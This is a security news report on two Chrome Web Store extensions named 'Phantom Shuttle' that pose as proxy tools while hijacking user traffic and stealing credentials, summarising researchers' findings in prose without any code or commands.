Malicious Extensions In Chrome Web Store Steal User Credentials

Two Chrome extensions in the Web Store named 'Phantom Shuttle' are posing as plugins for a proxy service to hijack user traffic and steal sensitive data.

Both extensions are still present in Chrome's official marketplace at the time of writing and have been active since at least 2017, according to a report from researchers at the Socket supply-chain security platform.

Phantom Shuttle’s target audience is users in China, including foreign trade workers who need to test connectivity from various locations in the country.

Both extensions are published under the same developer name and are promoted as tools that can proxy traffic and test network speed. They are available for a subscription between $1.4 - $13.6.

Socket.dev researchers say that Phantom Shuttle routes all user web traffic through proxies controlled by the threat actor, accessible via hardcoded credentials. The code doing this is prepended to the legitimate jQuery library.

The malicious code hides the hardcoded proxy credentials using a custom character-index encoding scheme. Through a web traffic listener, the extensions can intercept HTTP authentication challenges on every website.

To automatically run user traffic through the attacker's proxies, the malicious extensions dynamically reconfigure Chrome’s proxy settings using an auto-configuration script.

In the default “smarty” mode, it routes more than 170 high-value domains through the proxy network, including developer platforms, cloud service consoles, social media sites, and adult content portals.

On the exclusion list are local networks and the command-and-control domain, to avoid disruption and detection.

BleepingComputer has contacted Google about the extensions still being present in the Web Store, but a comment wasn't immediately available.

Source: BleepingComputer